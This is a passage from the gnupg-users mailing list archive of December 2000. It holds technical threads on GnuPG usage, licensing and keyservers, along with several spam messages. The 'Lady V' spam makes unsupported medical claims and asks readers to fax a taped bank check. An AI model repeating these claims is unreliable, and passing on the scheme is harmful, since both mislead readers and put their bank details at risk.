Date: Sun, 17 Dec 2000 11:24:15 +0100 Subject: Lady V: The Pleasure Pill for Women! Message-ID: <200012171024.eBHAOFR29262@mail.hsp.de> LADY V: The Pleasure Pill for Women! Men Have Their Viagra®! Finally, A Pill for Women! It's Here! The Revolutionary Woman's Sexual Sensation is Now Available. Researchers are calling Lady V the greatest breakthrough for women since the Birth Control Pill. And you don't even need a prescription to get it! Welcome to the New Sexual Revolution! It's no secret that men have been having the time of their lives since the wonder pill Viagra® was made available. But, women were left out in the cold with no pill... nothing! Well now thanks to an all-star team of medical researchers who have been working around the clock, those days are finally over. The perfect female "pleasure pill" has been created and you don't even need a prescription. You can now get it from Lion Sciences! Lady V is the world's first pleasure pill scientifically designed for women. Lady V is an all-natural proprietary herbal blend of prosexual nutrients from around the world synergistically blended to naturally stimulate neurotransmitter endorphin signals. This magical combination increases targeted blood flow, unleashes natural stimulator for maximum stimulation, triggering pleasure responses quickly. Lady V is safe, natural and doctor-recommended. Since its introduction Lady V has been taking the world by storm! >From Malibu to Miami women are enjoying the most intense pleasure of their lives! • 100% Natural • Safe • The Highest Quality Pharmaceutical Pure Nutraceuticals • Guaranteed Potency • Certified Purity Lady V is Sweeping the Nation! Women are going crazy over Lady V. Suddenly couples are falling in love all over again. The passion and pleasure that women are reporting is off the charts! Lady V has an incredible 88% success rate. Best of all, while Viagra costs $10 a pill, Lady V costs less than $1 a pill! It's not just a man's world anymore! Just look at what a few women have to say: "I thought my love life was good before, but now it is out of this world! Lady V is remarkable." — Mary J., Interior Designer "I haven't smiled like this in a long time. My husband and I feel like a couple of 19 year olds again!" — Debra T, Assistant Buyer "Imagine what it would feel like to have incredible passion and pleasure anytime you want." — Jennifer C., Film Editor "Suddenly my husband and I are spending more time in the bedroom instead of the TV room." — Angie R., Realtor Ingredients: Vitamin D, Niacin, Vitamin B6, Folic Acid, Vitamin B12, Avena Sativa, Kava Kava, Guarana, White Willow Extract, Mura Puama, St. John's Wort, Siberian Ginseng, Cordyceps, Damiana, and L-Taurine. Each bottle of Lady V contains 30 tablets. Take three capsules one hour before romantic activity as a dietary supplement. Risk Free: Double Your Money Back Guarantee If Lady V does not give the desired results as stated above, simply return the unused portion for a double-your money back refund. No questions asked! Order Now: Safe, Fast, Secure, Private Lady V with its DOUBLE YOUR MONEY BACK GUARANTEE is available only through this special promotional offer. Herbal V arrives in plain packaging for your privacy. Any and all information is kept strictly confidential. Payment Methods You may FAX or Postal Mail Checks, MasterCard, Visa, & American Express.payments. Money Orders are accepted only by Postal Mail. Each bottle of Lady V contains 30 tablets. Step 1: Place a check by your desired quanity. ______ 1 Bottle of Lady V $26 ______ 2 Bottles of Lady V $46 ______ 3 Bottles of Lady V $59 Please add $6 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$32, 2 bottles=$52, 3 bottles=$65 ] International Orders Please add $18 shipping and handling for any size order. [ Total cost including shipping & handling, 1 bottle=$43, 2 bottles=$63, 3 bottles=$77 ] We cannot accept foreign checks. International money orders or credit cards only. Step 2: Place a check by your desired payment method and complete fields if necessary. _____Check or CHECK-BY-FAX [details below] _____Money Order _____American Express Account Number__________________ Exp____/____ _____Visa Account Number__________________ Exp____/____ _____MasterCard Account Number__________________ Exp____/____ Please make your check or money order payable to "LSN". Step 3: Please complete and print the following fields clearly. Name ___________________________________________________ Address _________________________________________________ City ____________________________________________________ State ___________________________________________________ Zip _____________________________________________________ E-mail __________________________________________________ Signature _________________________________________________ [ required for check and credit card orders] Toll Free FAX Order Line: 1-800-940-6590 If faxing in your order, please state whether you require a fax, email, or no confirmation at all. Allow up to one day for confirmation, if requested. FAX orders are processed immediately. Or, print & mail to: LSN 273 S. State Rd. 7, #193 Margate, FL 33068-5727 ______________________________________________________ *CHECK BY FAX ORDERS: Complete the check as normal. Tape the check in the area below. Below the check, clearly write the check number, all numbers at the bottom of the check, & your name. Tape the check below and fax the check to the toll free FAX number above. Void the check. Our merchant will electronically debit your account for the amount of the check; your reference number for this transaction will be your check number. Nothing could be safer & easier ! TAPE CHECK BELOW _____________________________________________________________ This is a one time mailing: Removal is automatic and no further contact is necessary. Please Note: Lady V is not intended to diagnose, treat, cure or prevent any disease. As individuals differ, so will results. Lady V helps provide herbal and nutritional support for female sexual performance. The FDA has not evaluated these statements. For details about our double your money back guarantee, please write to the above address, attention consumer affairs department; enclose a self addressed stamped envelope for this and any requested contact information. Thank You. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From brian.galbraith@bigfoot.com Sun Dec 17 16:06:34 2000 From: brian.galbraith@bigfoot.com (Brian Galbraith) Date: Sun, 17 Dec 2000 16:06:34 +0000 Subject: Symmetric encryption Message-ID: <20001217160634.6ed05f3f.brian.galbraith@bigfoot.com> It's a while since I used the symmetric encryption facility og GnuPG, and currently it does not appear to work for me. Is it broken on build 1.0.4b? Regards Brian -- Brian Galbraith [ Sylpheed 0.4.9pre1]| GnuPG 1.0.4b | SuSE Linux 7.0 ] Encrypted Mail Preferred http://the.earth.li:11371/pks/lookup?op=get&search=0x63EBA765 Hushmail Secure Webmail: bgalbraith@cyber-rights.net -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From andrew@mcdonald.org.uk Sun Dec 17 16:29:32 2000 From: andrew@mcdonald.org.uk (Andrew McDonald) Date: Sun, 17 Dec 2000 16:29:32 +0000 Subject: question regarding gnupg in my regular signature In-Reply-To: <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk>; from graham@todd276.worldonline.co.uk on Thu, Dec 14, 2000 at 07:36:33PM +0000 References: <20001213230627.26F3.GRAHAM@todd276.worldonline.co.uk> <20001214191017.B688@mcdonald.org.uk> <20001214192642.18E1.GRAHAM@todd276.worldonline.co.uk> Message-ID: <20001217162932.A639@mcdonald.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Thu, Dec 14, 2000 at 07:36:33PM +0000, Graham wrote: > AM> > AM> PGP/MIME has advantages over the older application/pgp format, and it > AM> would be nice to see it supported by all the mailers that offer "pgp > AM> support". The pgp/mime standard in rfc2015 is 4 years old, and lots of > AM> MUAs seem to support S/MIME. :) > AM> RFC 2440, does after all say: "An application that implements OpenPGP > AM> for messaging SHOULD implement OpenPGP-MIME." (See RFC2119 for the > AM> meaning of 'SHOULD'). > > You're probably right, but specifically what advantages? Some are advantages for the mailer, e.g. single MIME standard for encrypted/signed e-mail (PGP/MIME is essentially the same as S/MIME in its basic structure). Some for the user, e.g. you can encrypt and sign attachments along with the e-mail body, you can extract the original message without having to pull off the PGP wrappings yourself. The first of those two is probably one I find most useful. AFAIK, with the Outlook plug-in you would need to separately encrypt/sign any attachments first (I'll double check that tomorrow). I think the 'clear-signing' method was probably created because, at the time, there was no other way to do it. I think with MIME as a standard PGP/MIME somehow becomes 'more obvious'. > PGP has a plug-in which integrates more seamlessly with Outlook than > Eudora or Outlook Express. The problem I would think is that you're > trying to get a MUA (Mutt) which defaults to PGP/MIME under Linux, to > produce something which can be understood by a Windows application > (Outlook) for which there is no PGP/MIME support. Despite somebody > telling me that this difference is not an OS problem, but an > application problem, most Windows MUAs do not have PGP/MIME support if > they have PGP. Actually, I think there are probably quite a few more MUAs under Linux that support PGP in a non-PGP/MIME form than support PGP/MIME. With the Outlook plug-in, it simply processes the content of the text edit window, getting it to do the header/structure modifications for PGP/MIME (or even setting the content-type to application/pgp) is probably more difficult to do from a plug-in. > AM> By terming my macros "a bit of a cludge". I meant that mutt's PGP/MIME > AM> support was so nice, easy and clean to use; using these macros seem > AM> very horrible in comparison. :( > > I understand that, but for we Windows users, PGP/MIME seems so > unwieldy, so non-standard, and suspicious as we try to avoid > attachments.... Its just your point of view.... Well, if the mailer supported PGP/MIME you wouldn't see any attachments, just as you don't with an MUA that supports S/MIME on S/MIME encoded messages. ;-) Best wishes, Andrew - -- Andrew McDonald E-mail: andrew@mcdonald.org.uk http://www.mcdonald.org.uk/andrew/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6POnl/LupyPLe7TYRAkqCAJ9/9v6+0yzO3H/aHeQ/2uGaTnpHFACghSJU KREdH5ZLR1JZYlcnIYb9hT4= =e4d0 -----END PGP SIGNATURE----- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From yj4BvSr0D@myfreeoffice.com Sun Dec 17 01:05:58 2000 From: yj4BvSr0D@myfreeoffice.com (yj4BvSr0D@myfreeoffice.com) Date: 17 Dec 00 1:05:58 AM Subject: FWD: FROM JOHN Message-ID: CHECK THIS OUT. JOHN SENT IT TO ME, I THOUGHT YOU WOULD BE INTERESTED! HTTP://www.geocities.com/newestpage5543/ipb.html TO BE REMOVED FROM ALL FUTURE EMAILS, SIMPLY REPLY WITH "REMOVE" IN THE SUBJECT LINE -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 17:53:12 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 12:53:12 -0500 Subject: faulty behavior of gpg --export string1 Message-ID: <20001217125312.C233@chaosreigns.com> --opJtzjQTFsWo+cga Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable When I do "gpg --list-keys string", it lists every key containing "string" in the name or email address. But when I do a "gpg --export string", it only exports the first key that matches "string". The easiest way I've found to test this is=20 "gpg --export string | gpg", which will list the names of all the keys that you exported. So to achieve the same functionality I'm looking for from "gpg --export string", I have to do something like: gpg --export `gpg --list-keys string | grep ^pub | cut -d'/' -f2 | cut -d' = ' -f1` --=20 http://www.ChaosReigns.com --opJtzjQTFsWo+cga Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6PP2If7Wwvg6f+HkRAu7zAJ9f+Jsh13KNTSBwRA7Px8fnSbJxigCfT9VQ EB29Q3mHFnLGaaDfJacfqnE= =zOkO -----END PGP SIGNATURE----- --opJtzjQTFsWo+cga-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 18:37:58 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 13:37:58 -0500 Subject: "Name must be at least 5 characters long" Message-ID: <20001217133757.B21064@chaosreigns.com> I object. My public key is: pub 1024D/0E9FF879 2000-09-05 Darxus Having the extra "Darxus" in there is extraneous. An older key of mine, generated probably with an old version of pgp, is this: pub 1024R/FE3821D9 1998-12-12 darxus@op.net sig! FE3821D9 1998-12-12 darxus@op.net ..which works fine. So it appears possible for a valid key to exist without a name field at all. gpg is just being a pain in not letting me do what I want. -- http://www.ChaosReigns.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Darxus@ChaosReigns.com Sun Dec 17 19:09:50 2000 From: Darxus@ChaosReigns.com (Darxus@ChaosReigns.com) Date: Sun, 17 Dec 2000 14:09:50 -0500 Subject: "Name must be at least 5 characters long" In-Reply-To: <20001217133757.B21064@chaosreigns.com>; from Darxus@ChaosReigns.com on Sun, Dec 17, 2000 at 01:37:58PM -0500 References: <20001217133757.B21064@chaosreigns.com> Message-ID: <20001217140950.D21064@chaosreigns.com> My most humble apologies for wasting your time.... --allow-freeform-uid Disable all checks on the form of the user ID while generating a new one. This option should only be used in very special environments as it does not ensure the de-facto standard format of user IDs. ..found this as I was about to modify the source to let me do it. -- http://www.ChaosReigns.com -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From 6KkA6cn0U@myfreeoffice.com Sun Dec 17 03:50:07 2000 From: 6KkA6cn0U@myfreeoffice.com (6KkA6cn0U@myfreeoffice.com) Date: 17 Dec 00 3:50:07 AM Subject: FWD: MORE INFO ON THE PHONE SERVICE Message-ID: You Are Receiveing This Again, Due To Another Typo In The Last Web Address. $99 Flatrate Longdistance STATE TO STATE / UNLIMITED CALLS GET RID OF THOSE HUGE LONG DISTANCE BILLS. DOESN'T TAKE AWAY FOCUS FROM YOUR PRIMARY PROGRAM!! SO... GET YOUR WHOLE DOWNLINE ON IT FOR RAPID GROWTH IN YOUR CURRENT PROGRAM!! http://www.geocities.com/redir13321/redirect.html This Is A Weekly Mail List. To Be Removed Permanently Email permenentremoval@excite.com with "remove" somewhere in the subject line. PERMANENT REMOVAL!! (May Take 1-2 days to be completely off all lists) -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 13:05:34 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 2000 14:05:34 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <976900291.3a3a50c3ac947@nullify.org>; from aphex@nullify.org on Fri, Dec 15, 2000 at 11:11:31AM -0600 References: <976900291.3a3a50c3ac947@nullify.org> Message-ID: <20001218140534.E12265@gnupg.de> On Fri, 15 Dec 2000, Keith Ray wrote: > I have been able to successfully cross-compile GnuPG 1.0.4-1 to include the > IDEA cipher for Windows. Since this binary now includes both RSA and IDEA, it > should be fully backwards compatible with PGP 2.6.x. > > The following changes were made from a "standard" cross-compile: > 1. Statically linked idea.c. Unlike Cygwin, this release requires no DLLs. By releasing this software you are violating the GPL: 7. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Program at all. For example, if a patent license would not permit royalty-free redistribution of the Program by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Program. Please stop distributing this release. > extensive testing so use caution. The binary can be downloaded at > www.nullify.org. Please email me if you have any questions or problems. If you are providing the binary, you have to provide the source too. One hint: By releasing a patch to GnuPG under a license which does not have the patent clause and is compatible with the GPL, you can avoid the GPL violation. Frankly, this is the reason why those modules are there. The GNU project does not distribute them but a user may choose to acquire them and use them together with GnuPG. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 14:51:51 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 15:51:51 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218140534.E12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: Werner Koch writes: > > 1. Statically linked idea.c. Unlike Cygwin, this release requires > > no DLLs. > > By releasing this software you are violating the GPL: No, he isn't. > 7. If, as a consequence of a court judgment or allegation of > patent infringement or for any other reason There is neither a court judgment or allegation of patent infringement. Things may change quite rapidly as soon as he gets a cease and desist letter, but the current situation---distributing GPLed source (and binaries) which clearly infringes some software patents--is common practice (even the FSF does it, see the networking code in GNU libc, and GnuPG's crypto algorithms except Rijndael are probably candidates as well). -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lhecking@nmrc.ie Mon Dec 18 15:04:53 2000 From: lhecking@nmrc.ie (Lars Hecking) Date: Mon, 18 Dec 2000 15:04:53 +0000 Subject: Test failure on NetBSD Message-ID: <20001218150453.A23106@nmrc.ie> The conventional-mdc.test fails on NetBSD 1.5 (and I think, it did on 1.4.2, too). | #info Checking conventional encryption | for i in 0 1 2 3 9 10 11 19 20 21 22 23 39 40 41 8192 32000 ; do | for ciph in 3des cast5 blowfish twofish; do | dd if=data-80000 of=z bs=1 count=$i 2>/dev/null What happens is that for the first loop iteration, dd should generate a file "z" of size zero (correct?), but it creates no file at all, so that gpg exits with a message "z: no such file or directory". Whether the problem lies with dd or the assumption that it should generate a zero size file if invoked as above, I cannot say. The test works fine if I remove 0 from the loop, though. -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From dmichellis@uol.com.br Mon Dec 18 16:14:18 2000 From: dmichellis@uol.com.br (Deives Michellis) Date: Mon, 18 Dec 2000 14:14:18 -0200 Subject: Getting Started with gnuPG References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <000f01c0690d$936b7bc0$0300a8c0@help3> Hi all! I download the gnuPG for Windows (no jokes, please!) and I am completely lost about how to start to use it... When it will generate the pairs, gnuPG ask for the key (768 bytes or more). This key is "buyed" from some organizations (like VeriSign), or I can just make my own key and use it? Thanks a lot for take your atention!! Deives Michellis -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 16:26:50 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 2000 17:26:50 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: ; from Florian.Weimer@RUS.Uni-Stuttgart.DE on Mon, Dec 18, 2000 at 03:51:51PM +0100 References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> Message-ID: <20001218172650.I12265@gnupg.de> On Mon, 18 Dec 2000, Florian Weimer wrote: > There is neither a court judgment or allegation of patent > infringement. Things may change quite rapidly as soon as he gets a See the comments in idea.c - Ascom explicitly says that you have to acquire a license for nearly all kings of usage. > patents--is common practice (even the FSF does it, see the networking > code in GNU libc, and GnuPG's crypto algorithms except Rijndael are Patented networking code in libc? I don't know of any patent and I have never heard that someone claims that libc uses a patent them. There are no patents on any GnuPG crypto code which are not allowed by the GPL. In fact that was the reason GnuPG has been written. Werner -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lewis@sistina.com Mon Dec 18 16:39:44 2000 From: lewis@sistina.com (lewis@sistina.com) Date: Mon, 18 Dec 2000 10:39:44 -0600 Subject: GPG key not fully accepted by public key servers In-Reply-To: ; from stefan@epy.co.at on Sat, Dec 16, 2000 at 01:52:45AM +0100 References: <20001215160843.A11168@sistina.com> Message-ID: <20001218103944.A30434@sistina.com> --Qxx1br4bt0+wmkIi Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Sat, Dec 16, 2000 at 01:52:45AM +0100, Stefan H. Holek wrote: > On Fri, 15 Dec 2000 lewis@sistina.com wrote: >=20 > > On Fri, Dec 15, 2000 at 04:01:39PM -0600, Brian Minton wrote: > > > On Fri, Dec 15, 2000 at 02:32:16PM -0600, lewis@sistina.com wrote: > > > > Key block corrupt: more than one signature on subk > > >=20 > > > what happens when you do gpg --export 00292648 |gpg --list-packets ? > >=20 >=20 > You have to examine the key *returned* from the keyserver. Gpg will not > import such a key, but you can download and then export it with pgp or > cut & paste it from the web interface. >=20 > You will see something like this=20 > (two subkeys and only one binding signature): =20 Ok, I'm confused (sorry...I feel really stupid) but what do I do with this information. Here's the output from the key I grabbed from pgp.ai.mit.edu. ~> gpg --list-packets test.asc Mon 12.18 10:38 :public key packet: version 4, algo 17, created 974309008, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1016 bits] pkey[3]: [1022 bits] :user ID packet: "AJ Lewis (Roadrunner) " :signature packet: algo 17, keyid 941E126100292648 version 4, created 974309008, md5len 0, sigclass 13 digest algo 2, begin of digest f3 29 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [160 bits] data: [156 bits] :user ID packet: "AJ Lewis " :signature packet: algo 17, keyid 941E126100292648 version 4, created 975593280, md5len 0, sigclass 13 digest algo 2, begin of digest d1 be hashed subpkt 2 len 5 (sig created 2000-11-30) hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) hashed subpkt 21 len 3 (pref-hash-algos: 3 2) hashed subpkt 22 len 3 (pref-zip-algos: 2 1) hashed subpkt 23 len 2 (key server preferences) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [159 bits] :public sub key packet: version 4, algo 16, created 974309011, expires 0 pkey[0]: [1024 bits] pkey[1]: [3 bits] pkey[2]: [1023 bits] :public sub key packet: version 4, algo 17, created 974309312, expires 0 pkey[0]: [1024 bits] pkey[1]: [160 bits] pkey[2]: [1023 bits] pkey[3]: [1021 bits] :signature packet: algo 17, keyid 941E126100292648 version 4, created 974310923, md5len 0, sigclass 18 digest algo 2, begin of digest d6 95 hashed subpkt 2 len 5 (sig created 2000-11-15) hashed subpkt 9 len 5 (key expires after 180d0h31m) subpkt 16 len 9 (issuer key ID 941E126100292648) data: [158 bits] data: [160 bits] Regards, --=20 AJ Lewis Sistina Software Inc. Voice: 612-379-3951 1313 5th St SE, Suite 111 Fax: 612-379-3952 Minneapolis, MN 55414 E-Mail: lewis@sistina.com http://www.sistina.com Current GPG fingerprint =3D 3B5F 6011 5216 76A5 2F6B 52A0 941E 1261 0029 2= 648 Hey! It compiles! Ship it! --Qxx1br4bt0+wmkIi Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE6Pj3QpE6/iGtdjLERApWHAJ9NaZTi8ZDjsX31mX8EOrrpCMLEUwCfeo1E EU6DGIBZdYnhQ5X30cUIXhU= =vYDy -----END PGP SIGNATURE----- --Qxx1br4bt0+wmkIi-- -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stephan.stapel@tu-clausthal.de Mon Dec 18 16:44:57 2000 From: stephan.stapel@tu-clausthal.de (Stephan Stapel) Date: Mon, 18 Dec 2000 17:44:57 +0100 Subject: Description of --list-packets Message-ID: <002b01c06911$dad6e1d0$2bf8ae8b@bert> Hello! Can anyone please tell me what I can do with the list-packets command? The description on the manpage is rather short! Thanks, Stephan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From lists@wordit.com Mon Dec 18 17:55:39 2000 From: lists@wordit.com (Marcus) Date: Mon, 18 Dec 2000 18:55:39 +0100 Subject: Win32 Installation Package for GPG/WinPT (new) In-Reply-To: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> References: <5.0.2.1.0.20001215091602.028c3260@maia.netsonic.net> Message-ID: <200012181855390230.00486048@smtprelay.t-online.de> On 15.12.00 at 10:04 Ed Suominen wrote: >Without modifying the source of either GPG or WinPT, I've put together an >installation package that allows users to install both programs without >needing to access the command prompt. I think this a great idea. If more people are to use GPG then user friendly tools are required for GUI installation. Ed, which Windows OS are you using? I'm on NT 4, and I think the setup batch file failed. It gave two errors in the DOS window, but continued, then ran WinPT.exe, and stopped. No key creation, and I can't find the drag and drog icons. Marcus Friedlaender -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 17:52:31 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 18:52:31 +0100 Subject: Description of --list-packets In-Reply-To: <002b01c06911$dad6e1d0$2bf8ae8b@bert> References: <002b01c06911$dad6e1d0$2bf8ae8b@bert> Message-ID: "Stephan Stapel" writes: > Can anyone please tell me what I can do with the list-packets command? The > description on the manpage is rather short! Read RFC 2440. After that, you'll be able to understand the --list-packets output. -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From Florian.Weimer@RUS.Uni-Stuttgart.DE Mon Dec 18 18:17:07 2000 From: Florian.Weimer@RUS.Uni-Stuttgart.DE (Florian Weimer) Date: 18 Dec 2000 19:17:07 +0100 Subject: GnuPG 1.0.4-1 + IDEA for Windows In-Reply-To: <20001218172650.I12265@gnupg.de> References: <976900291.3a3a50c3ac947@nullify.org> <20001218140534.E12265@gnupg.de> <20001218172650.I12265@gnupg.de> Message-ID: Werner Koch writes: > On Mon, 18 Dec 2000, Florian Weimer wrote: > > > There is neither a court judgment or allegation of patent > > infringement. Things may change quite rapidly as soon as he gets a > > See the comments in idea.c - Ascom explicitly says that you have to > acquire a license for nearly all kings of usage. Well, we were told a slightly different story when we asked them a few years ago (see http://cert.uni-stuttgart.de/projects/usca-idea.php). YMMV. > > patents--is common practice (even the FSF does it, see the networking > > code in GNU libc, and GnuPG's crypto algorithms except Rijndael are > > Patented networking code in libc? I don't know of any patent and I > have never heard that someone claims that libc uses a patent them. The concept of standard network byte order, as it is used in the Internet protocols and provided by htonl() and friends, is patented. > There are no patents on any GnuPG crypto code which are not allowed > by the GPL. In fact that was the reason GnuPG has been written. What about the Schnoor patent and DSA? And the two Hitachi patents? -- Florian Weimer Florian.Weimer@RUS.Uni-Stuttgart.DE University of Stuttgart http://cert.uni-stuttgart.de/ RUS-CERT +49-711-685-5973/fax +49-711-685-5898 -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 18 18:54:34 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 18 Dec 2000 19:54:34 +0100 (CET) Subject: GPG key not fully accepted by public key servers In-Reply-To: <20001218103944.A30434@sistina.com> Message-ID: On Mon, 18 Dec 2000 lewis@sistina.com wrote: > Ok, I'm confused (sorry...I feel really stupid) but what do I do with this > information. Here's the output from the key I grabbed from pgp.ai.mit.edu. No reason to feel stupid here! And nothing much you can do either. As of now you should not use pks-type keyservers if you have multiple subkeys. Distribute your public key directly by e.g. linking to it from your webpage. > ~> gpg --list-packets test.asc Mon 12.18 10:38 > :public key packet: > version 4, algo 17, created 974309008, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [160 bits] > pkey[2]: [1016 bits] > pkey[3]: [1022 bits] > :user ID packet: "AJ Lewis (Roadrunner) " > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 974309008, md5len 0, sigclass 13 > digest algo 2, begin of digest f3 29 > hashed subpkt 2 len 5 (sig created 2000-11-15) > hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) > hashed subpkt 21 len 3 (pref-hash-algos: 3 2) > hashed subpkt 22 len 3 (pref-zip-algos: 2 1) > hashed subpkt 23 len 2 (key server preferences) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [160 bits] > data: [156 bits] > :user ID packet: "AJ Lewis " > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 975593280, md5len 0, sigclass 13 > digest algo 2, begin of digest d1 be > hashed subpkt 2 len 5 (sig created 2000-11-30) > hashed subpkt 11 len 5 (pref-sym-algos: 7 10 3 4) > hashed subpkt 21 len 3 (pref-hash-algos: 3 2) > hashed subpkt 22 len 3 (pref-zip-algos: 2 1) > hashed subpkt 23 len 2 (key server preferences) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [158 bits] > data: [159 bits] > :public sub key packet: > version 4, algo 16, created 974309011, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [3 bits] > pkey[2]: [1023 bits] >>>>>>>>> HERE SHOULD BE A BINDING SIGNATURE <<<<<<<<<<< > :public sub key packet: > version 4, algo 17, created 974309312, expires 0 > pkey[0]: [1024 bits] > pkey[1]: [160 bits] > pkey[2]: [1023 bits] > pkey[3]: [1021 bits] > :signature packet: algo 17, keyid 941E126100292648 > version 4, created 974310923, md5len 0, sigclass 18 > digest algo 2, begin of digest d6 95 > hashed subpkt 2 len 5 (sig created 2000-11-15) > hashed subpkt 9 len 5 (key expires after 180d0h31m) > subpkt 16 len 9 (issuer key ID 941E126100292648) > data: [158 bits] > data: [160 bits] Regards, Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From stefan@epy.co.at Mon Dec 18 19:13:09 2000 From: stefan@epy.co.at (Stefan H. Holek) Date: Mon, 18 Dec 2000 20:13:09 +0100 (CET) Subject: Getting Started with gnuPG In-Reply-To: <000f01c0690d$936b7bc0$0300a8c0@help3> Message-ID: On Mon, 18 Dec 2000, Deives Michellis wrote: > I download the gnuPG for Windows (no jokes, please!) and I am completely > lost about how to start to use it... There is the GNU Privacy Handbook at http://www.gnupg.org/docs.html > When it will generate the pairs, gnuPG ask for the key (768 bytes or more). > This key is "buyed" from some organizations (like VeriSign), or I can just > make my own key and use it? Luckily, you never have to buy a key, and - even better - by using PGP you also have full control over your trust relationships and do not have to "rent" trust from large corporations... Stefan -- Archive is at http://lists.gnupg.org - Unsubscribe by sending mail with a subject of "unsubscribe" to gnupg-users-request@gnupg.org From wk@gnupg.org Mon Dec 18 19:59:58 2000 From: wk@gnupg.org (Werner Koch) Date: Mon, 18 Dec 